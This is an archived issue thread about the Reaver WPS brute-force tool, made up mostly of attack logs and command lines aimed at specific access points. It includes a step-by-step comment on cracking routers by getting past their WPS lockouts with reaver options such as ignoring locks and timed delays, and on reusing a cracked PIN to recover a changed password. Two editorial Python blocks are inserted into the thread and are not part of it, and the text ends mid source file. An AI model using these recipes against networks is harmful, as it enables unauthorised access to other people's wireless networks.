Open GoogleCodeExporter opened 9 years ago
I'm hoping the '-120db' is a typo and you really mean -12db if they're sitting
on the same desk. :)
Yes, we have to clean up all the attachments on the project, Google limits it
to 50MB I believe. You can post a link to wherever you want to upload the pcap,
or email it to me directly, whichever you prefer.
The 0x02 and 0x03 codes are just re-iterating the messages that you are already
seeing: receive timeouts and out of order packets respectively. Without seeing
the pcap it's hard to say what the problem might be, but you might try the
--no-nacks option which will prevent Reaver from instantly NACKing out of order
packets.
Original comment by cheff...@tacnetsol.com
on 23 Jan 2012 at 5:36
Oh my! Yes, that's a typo! :)
I have uploaded the pcap to http://c0refailure.com/reaver-issues.zip
However, after adding the command line --no-nacks, the attack *appears* to be
working! It is definitely iterating through pins, albeit at a rate of 4
seconds/pin.
Would it be of use if I attached a pcap of the attack with the --no-nacks option?
Original comment by m...@c0refailure.com
on 23 Jan 2012 at 11:44
I've seen some APs that blast out M1 packets until they get an M2 response,
instead of just sending one M1 packet and waiting. The result is that Reaver
sends the M2, but then gets another M1 packet and thinks something has gone
wrong, kills the session, and starts over. The --no-nacks disables this logic,
so I suspect that's what was happening with your AP.
Original comment by cheff...@tacnetsol.com
on 23 Jan 2012 at 12:56
Unfortunately, I also experience similar problems:
[+] Trying pin 01405675
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
If I specify -d 5, it seems to work (@ 7 seconds/pin speed). With a lower value
than 5 it fails (as above).
Using Reaver 1.4 on BT5R1 with stock/latest compat-wireless (tested
patched/non-patched too), USB wireless adapter with ath9k_htc driver and latest
firmware (1.3). The target AP is a linksys. wash output is OK.
Original comment by jo...@tracid.ro
on 23 Jan 2012 at 1:50
jozsi: I've run into similar problems, some APs just can't handle faster
attempts. Out of curiosity, what model Linksys is it?
Original comment by cheff...@tacnetsol.com
on 23 Jan 2012 at 2:14
It's a WRT160N with stock firmware.
Original comment by jo...@tracid.ro
on 23 Jan 2012 at 2:16
Unfortunately, after some time I start getting:
[+] Trying pin 13305673
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 13315672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 13315672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 12.18% complete @ 2012-01-23 11:20:23 (7 seconds/pin)
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
...snip...
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
Original comment by jo...@tracid.ro
on 23 Jan 2012 at 4:24
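An added example, not part of this thread and not Reaver's own code: it splits a -vv log like the excerpt above into per-pin transactions and classifies each by the failure reasons cheffner explained earlier in the thread (code 0x02 is a receive timeout, code 0x03 an out-of-order message such as a second M1 arriving after M2 was sent). That is the check an AP owner testing their own device wants in order to tell an AP that has stopped answering (lockdown, RF) from one whose WPS state machine is out of sync. The sample log is constructed in the same format as the excerpt; the class and function names are mine.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

TRY_RE = re.compile(r"\[\+\] Trying pin (\d{8})")
RECV_RE = re.compile(r"\[\+\] Received (M\d|WSC NACK)")
FAIL_RE = re.compile(r"\[!\] WPS transaction failed \(code: 0x([0-9a-fA-F]{2})\)")


@dataclass
class Transaction:
    """One '[+] Trying pin ...' attempt and what the AP sent back."""
    pin: str
    received: List[str] = field(default_factory=list)  # "M1", "M3", "WSC NACK", ...
    fail_code: Optional[str] = None                     # "02", "03", ... or None

    def repeated_message(self) -> Optional[str]:
        """First M-message whose number did not advance: a second M1 after M2
        went out (the 'AP blasts M1' case) or M3 arriving again after M4."""
        last = 0
        for name in self.received:
            if name.startswith("M"):
                number = int(name[1:])
                if number <= last:
                    return name
                last = number
        return None

    def outcome(self) -> str:
        if self.fail_code == "02":
            return "timeout"        # AP stopped answering: lockdown, RF, or too fast
        if self.fail_code == "03":
            return "out_of_order"   # unexpected/duplicate message, see repeated_message()
        if self.fail_code is not None:
            return "failed_0x" + self.fail_code
        if "WSC NACK" in self.received:
            return "pin_rejected"   # normal progress: the AP checked the pin and said no
        return "incomplete"         # cut off (^C) or the log ended mid-exchange


def parse_transactions(log: str) -> List[Transaction]:
    """Split a Reaver -vv log into per-pin transactions."""
    txs: List[Transaction] = []
    for raw in log.splitlines():
        line = raw.strip()
        m = TRY_RE.match(line)
        if m:
            txs.append(Transaction(pin=m.group(1)))
            continue
        if not txs:
            continue                # banner / association lines before the first attempt
        m = RECV_RE.match(line)
        if m:
            txs[-1].received.append(m.group(1))
            continue
        m = FAIL_RE.match(line)
        if m:
            txs[-1].fail_code = m.group(1).lower()
    return txs


def summarize(txs: List[Transaction]) -> Tuple[Counter, int]:
    """Outcome histogram plus the longest run of consecutive failed attempts,
    the kind of counter behind the '10 failed connections in a row' warning."""
    counts = Counter(tx.outcome() for tx in txs)
    longest = run = 0
    for tx in txs:
        run = 0 if tx.outcome() in ("pin_rejected", "incomplete") else run + 1
        longest = max(longest, run)
    return counts, longest


# Constructed sample in the format of the excerpt above: one rejected pin, one
# duplicate-M1 failure (0x03), then the same pin timing out three times (0x02).
_TIMEOUT_TX = """\
[+] Trying pin 13325671
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
"""
SAMPLE_LOG = """\
[+] Trying pin 13315672
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
""" + _TIMEOUT_TX * 3
```

Running `summarize(parse_transactions(SAMPLE_LOG))` on the sample gives one pin_rejected, one out_of_order and three timeouts, with a longest failure run of 4.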
jozsi, how long does this last? Does it recover and start trying pins again?
Original comment by cheff...@tacnetsol.com
on 23 Jan 2012 at 4:41
I notice the same issue on several APs after upgrading to reaver 1.4. With
reaver 1.3 all these APs were easily attackable, but now it just loops on one
PIN number.
I even tried supplying a known PIN under reaver 1.4 and had no luck attacking
WPS even when the PIN is known. Here is the output:
root@root:~/reaver-1.4/src# reaver -i mon0 -vv -b 00:18:E7:E7:59:4E -c 1 --pin=60251749
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 00:18:E7:E7:59:4E
[+] Associated with 00:18:E7:E7:59:4E (ESSID: dlink)
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 90.95% complete @ 2012-01-23 08:48:46 (9 seconds/pin)
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 90.99% complete @ 2012-01-23 08:49:16 (7 seconds/pin)
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
^C
It seems something has gone wrong in this release of reaver.
Original comment by kbus...@gmail.com
on 23 Jan 2012 at 7:18
kbuster: I just ran the 1.4 release version of Reaver from two separate
machines using two different cards (rtl8187 and ath9k) against two different
APs and specifying the pin worked for me:
reaver@reaver:~/Downloads/reaver-1.4/src$ sudo ./reaver -i mon0 -b 54:E6:FC:9A:12:50 -vv --pin=09030879 -c 9
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 9
[+] Waiting for beacon from 54:E6:FC:9A:12:50
[+] Associated with 54:E6:FC:9A:12:50 (ESSID: TP-LINK_9A1250)
[+] Trying pin 09030879
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '09030879'
[+] WPA PSK: 'super secret passphrase'
[+] AP SSID: 'TP-LINK_9A1250'
Specifying the wrong pin results in the same output that you are getting. Since
you said 1.3 worked on these same APs before, what output do you get when
running 1.3 with the --pin option specified?
Original comment by cheff...@tacnetsol.com
on 23 Jan 2012 at 7:42
Craig: indeed, it does recover itself within ~4 minutes. I'll post back if I
encounter a case where self-recovery fails.
Original comment by jo...@tracid.ro
on 23 Jan 2012 at 8:17
Thanks jozsi. What sometimes happens is the WPS state machine in the AP gets
out of sync and you have to wait a few minutes for it to reset itself and
start accepting new pins again.
Original comment by cheff...@tacnetsol.com
on 23 Jan 2012 at 8:23
I have noticed this resetting issue in a NETGEAR AP I tested on. I found out it
accepted/replied on precisely 29 pins, then gave me timeouts/failures on the
30th attempted pin for exactly 5 minutes (I found out by using -x298), after
which it would start accepting pin requests again.
But then a strange thing happened: after having successfully tried ~40% of all
pins on this AP, WPS crashed (I got only timeouts after that), while leaving
everything else on the modem/router/AP intact, which seemed very unusual to me.
This shows that WPS is a totally separate process on this modem/AP. Even VPN
configs, NAT bypasses and all sorts of complex configs on this AP were still
fully functional!
Only a hard reboot (power on-off-on) reinstated the WPS functionality of this
NETGEAR modem.
Original comment by jul...@gmail.com
on 24 Jan 2012 at 10:50
I have noticed with the Netgear WNR2000 that it locks after a very small
number of tests (I'll have to check after work, but from memory it was
well less than 30!), then locked itself out for a period too. I did
notice that reaver did not continue the attack, and that I had to
restart reaver for the attack to continue.
Original comment by m...@c0refailure.com
on 25 Jan 2012 at 2:17
Hello,
I tested my Linksys WAP610N AP, but I didn't succeed. I used a TP-LINK WN321G USB
wireless card; it supports monitor mode and packet injection, and I usually use
it for wireless cracking.
Do you have any idea about this issue?
# reaver -i mon0 --pin=71331818 -b 38:CC:21:B9:75:23 -c 11 -vv --no-nack -d 5 -f -x298
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 11
[+] Waiting for beacon from 38:CC:21:B9:75:23
[+] Associated with 38:CC:21:B9:75:23 (ESSID: Test_Network)
[+] Trying pin 71331818
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 71331818
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 71331818
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 71331818
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
Original comment by audience...@gmail.com
on 31 Jan 2012 at 10:21
Found this today, thought I would share:
http://support.netgear.com/app/answers/detail/a_id/19824
"Netgear home routers will protect themselves after several failed attempts to
authenticate as an external registrar by entering a lock-down state. During the
lock-down state, all WPS attempts using the Router PIN will not work. The
router will return from the lock-down state after a predetermined time period. "
I think we need to dial in on that predetermined time.
Original comment by SuperSeo...@gmail.com
on 9 Feb 2012 at 11:11
I'm using an Alfa rtl8187 with reaver 1.4.
I found this way to make it work:
1. run: aireplay-ng mon0 -1 120 -a 68:7F:74:E2:4A:1C -e kitty-Home
2. then: reaver -i mon0 -A -b 68:7F:74:E2:4A:1C -c 6 -vv --no-nacks --win7
Hope this helps ;)
Original comment by itmanvn
on 12 Feb 2012 at 2:46
Ran into this issue with the latest reaver from git sources.
Original comment by gentooli...@gmail.com
on 1 May 2012 at 8:37
I pretty much end up with this same listing of messages, over and over, never
moving forward on the pin attempts.
reaver -i mon0 -b BSSID -vv -x 60
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with BSSID (ESSID: XXX)
[!] WARNING: Failed to associate with BSSID (ESSID: XXX)
[!] WARNING: Failed to associate with BSSID (ESSID: XXX)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Then it starts over again. Have tried with the --no-nack also, does not seem to
make a difference.
Original comment by g00gl3c...@gmail.com
on 9 May 2012 at 8:24
I have run into this problem repeatedly and I think I've figured it out. First
of all, I would recommend that everyone read the documentation on reaver on
code.google.com (i.e. the Resources, FAQ, HintsAndTips, SupportedWirelessDrivers
and README documents at http://code.google.com/p/reaver-wps/w/list ). These
documents are extremely informative. The commands below have worked on the last
5 routers that I have successfully cracked. Cracking WPA2 is a bit of an
art form. You have to feel out each router. Sometimes routers simply don't like
having the default 1 second delay between pin attempts. I had one router that
gave me error code 0x02 consistently until I changed the delay time to 60
seconds! (i.e. "-d 60"). Any less than 60 seconds and it would give me a code
0x02 error. Another router I was working on didn't like the default timeout
period for receiving the M5 and M7 WPS response messages, which is 0.1 seconds,
so I changed the default timeout to 0.5 seconds (i.e. "-T .5") and it was
running flawlessly.
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 15 -r 3:15 -T .5 -x 360
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 5 -r 3:5 -T .5 -x 360
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 60 -r 3:15 -T .5 -x 360
"-i mon0" Obviously you'll need to specify the interface.
"-c 11" I find that specifying the channel stops reaver from needlessly channel
surfing; in this example I used channel 11.
"-b 00:01:02:03:04:05" This is the BSSID, which is another required argument in
reaver.
"-vv" This is the verbose option. Unlike the original verbose (i.e. "-v") this
option provides twice the original verbosity. I honestly prefer the "-v" option,
since I rarely run into errors as of late.
"-S" This option instructs reaver to use small Diffie-Hellman secret numbers.
These are pins that are common to most manufacturers of routers. In Switzerland,
for example, nearly all of the routers use the same standard WPS pin number and
this option checks for these kinds of pins.
"-N" This is the "no nacks" option. It's one less packet to capture and can
shorten the time it takes to crack the network.
"-L" This option ignores locks.
"-d 15" This is the delay time between pin attempts. Most routers like 15
seconds, but some are fine with 5 seconds and I've had one as high as 60
seconds.
"-r 3:15" This says that after 3 attempts, sleep for 15 seconds. This lets the
router cool off for a bit between attacks.
"-T .5" This is the timeout period for receiving the M5 and M7 response
messages. The default timeout is 0.1 seconds. I find that using .5 seconds is
sometimes preferred by some routers. You can set this option to as high as 1
second.
"-x 360" This option makes reaver sleep for 6 minutes if you get 10 failed
attempts in a row. This gives the router some time to cool off before you
resume your attack.
ADDITIONAL OPTION
"--pin=1234" Without getting too technical, the WPS pin is essentially validated
in two halves. Which is nice, since the pin number is 8 digits and trying 10^8
or 100,000,000 different combinations would take years to crack. Since there
are two halves, however, there are only 4 digits in the first half, which is
10^4 or 10,000 different combinations of pin number. In the second half there
are only 3 digits, which is 10^3 or 1,000 combinations, because the fourth digit
is a checksum (a binary summation of the first 7 digits that checks for
errors during transmitting and receiving the signal). Therefore, there are
11,000 different possible pin numbers. However, if at any time reaver reaches
90%, that means that the first 4 digits have been cracked and you should write
them down, because you can close BT5 and come back later and use this option
(i.e. "--pin=XXXX") to complete the second half of the pin number.
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 60 -r 3:15 -T .5 -x 360 --pin=2095
Furthermore if you crack the entire pin and the password is changed and EVEN IF
WPS IS TURNED OFF you can enter it as an option in the argument
"--pin=XXXXXXXX" and it will instantly give you the wpa password.
reaver -i mon0 -b 00:01:02:03:04:05 -vv --pin=12345670
Best of luck and loads of patience. :)
Original comment by Andrew.I...@gmail.com
on 14 Jul 2012 at 3:40
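An added example, not part of this thread or of Reaver, working through the "two halves" arithmetic in the comment above: the checksum rule for the 8th digit, why a fixed first half leaves exactly 1,000 second-half candidates rather than 10,000, why the total is 11,000 rather than 10^8, and why exhausting the first half lands at roughly 90% of Reaver's progress figure. The facts assumed are the ones from the WPS specification (8 decimal digits, the 8th a checksum with 3*(d1+d3+d5+d7) + (d2+d4+d6) + d8 == 0 mod 10, and the AP rejecting M4 for a wrong first half and M6 for a wrong second half); the function names are mine. This split is the design weakness that makes disabling the external-registrar PIN method the effective mitigation.

```python
from typing import Tuple


def wps_checksum_digit(first7: int) -> int:
    """Return the 8th digit that makes a 7-digit prefix a valid WPS PIN.

    WPS rule (assumed from the spec): 3*(d1+d3+d5+d7) + (d2+d4+d6) + d8
    must be 0 mod 10, so d8 is fixed by the first seven digits.
    """
    d = [int(c) for c in f"{first7:07d}"]
    acc = 3 * (d[0] + d[2] + d[4] + d[6]) + (d[1] + d[3] + d[5])
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True when pin is 8 digits and its checksum digit is consistent."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum_digit(int(pin[:7]))


def count_valid_completions(first_half: int) -> int:
    """Brute-force check: with digits 1-4 fixed, how many 4-digit tails pass
    the checksum?  The checksum removes exactly one digit of freedom, so the
    answer is 1,000, which is the '10^3' in the comment above."""
    return sum(is_valid_pin(f"{first_half:04d}{tail:04d}") for tail in range(10_000))


def search_space() -> Tuple[int, int, int]:
    """(first-half attempts, second-half attempts, total) when the AP reveals
    which half was wrong: the halves add (10^4 + 10^3) instead of multiplying."""
    first, second = 10 ** 4, 10 ** 3
    return first, second, first + second


def progress_after_first_half() -> float:
    """Share of the total search space consumed by exhausting the first half,
    i.e. the ~90% mark at which the first four digits are known."""
    first, _, total = search_space()
    return 100.0 * first / total


def full_pin(first_half: int, second_half: int) -> str:
    """Reassemble the 8-digit PIN from the 4-digit first half and the 3-digit
    second half; the checksum digit is derived, not searched."""
    first7 = first_half * 1000 + second_half
    return f"{first7:07d}{wps_checksum_digit(first7)}"


if __name__ == "__main__":
    # 12345670 (seen in a log later in this thread) is a checksum-valid PIN.
    print(is_valid_pin("12345670"), search_space(), round(progress_after_first_half(), 2))
    print(count_valid_completions(1234), full_pin(2095, 123))
```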
I should add that I was running BT5 R2 KDE (I love KDE. Transparent consoles
are awesome because you can see the BSSIDs in the other consoles. And the
Konqueror browser, love it.) in VM VirtualBox with reaver 1.4. Download VirtualBox
here --> https://www.virtualbox.org/wiki/Downloads .. And here is a video on how
to run BT5 in VirtualBox: http://www.youtube.com/watch?v=jrdovN-RVWk
Original comment by Andrew.I...@gmail.com
on 14 Jul 2012 at 4:21
^ @Andrew I tried all of the stuff you posted and variations of it but I still
get the errors below. Signal strength is -64dB so that shouldn't be the issue.
It ran perfectly for the first 20-30 mins and then after that all I got was the
following:
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Entering recurring delay of 15 seconds
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 2.65% complete @ 2012-07-19 04:29:26 (0 seconds/pin)
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Entering recurring delay of 15 seconds
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: 10 failed connections in a row
^CSegmentation fault
root@bt:~# reaver -i mon0 -c 6 -b XX:XX:XX:XX:XX:XX -vv -S -N -L -d 30 -r 3:30 -T .5 -x 360
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 6
[?] Restore previous session for XX:XX:XX:XX:XX:XX? [n/Y] Y
[+] Restored previous session
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: Belkin.XX)
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Entering recurring delay of 30 seconds
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 2.65% complete @ 2012-07-19 04:37:13 (0 seconds/pin)
[+] Entering recurring delay of 30 seconds
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
^C
[+] Session saved.
Original comment by ronquil...@gmail.com
on 19 Jul 2012 at 5:13
Andrew - encouraging results from your suggested parameters. Thanks for the
insight. I'm trialing Reaver on my Sagem AP ('Sky' box). Tricky little bugger,
particularly as it likes to lock for 60 minutes (literally 3600 seconds) once
it's spooked. You have to power off for a few seconds to clear the lock (the lock
state seems to persist through a console/soft reboot).
Previously, I was running Reaver as follows:
reaver -i mon0 -b 12:34:56:78:90:01 -vv
I've been getting 12 to 20 attempts with that.
However, after introducing -d 15 -r 3:15 and -S, the AP allows for 30 attempts
before locking. I will continue to play with the parameters, particularly an
increase in -d 60 as recommended. Luckily, the AP doesn't seem to lock
permanently as that would be a pain to have to keep going into the console to
enable it.
Cheers,
bt
Original comment by butttof...@gmail.com
on 23 Jul 2012 at 11:27
Any other tips for 0x02 and 0x04 (with M1 and M2 working)?
Original comment by ronquil...@gmail.com
on 25 Jul 2012 at 9:20
Here's something that may help anyone who keeps receiving lower-M messages
after sending a response to the initial message. While low signal and
interference obviously play a part, I recently had significant trouble with a
Netgear router w/ ~56 RSSI. Clearly a good signal, but I couldn't rule out
interference. However, I was until recently employed by a mobile phone
manufacturer (yep, the one which just laid off thousands of people) where we
would occasionally have trouble with cell networks that mimicked the problem I was
having with the Netgear router. Poor signal and interference do not
necessarily mean the receiving end does not get the message... just that the
phone and/or tower got responses back faster than they were expecting. Sorry
for the lengthy background info, but delays in sending messages were often the
answer.
I stuck in a 2/10 sec delay after receiving M-messages from the target router
before sending a response. The result, for me, was phenomenal. It has also
vastly improved cracking times, which were previously abysmal on a few other
routers due to low signal strength. I should also mention that I included '-d
3' and '-t 10' to provide more tolerance for interference/low signal strength.
YMMV with both the message delays and the command line options. I would be
interested in hearing others' results though.
So, without further ado, if anyone would like to give this a shot, replace the
contents of 'send.c' with the code pasted below and recompile (make clean,
configure, make, make install).
/*
 * Reaver - Transmit functions
 * Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
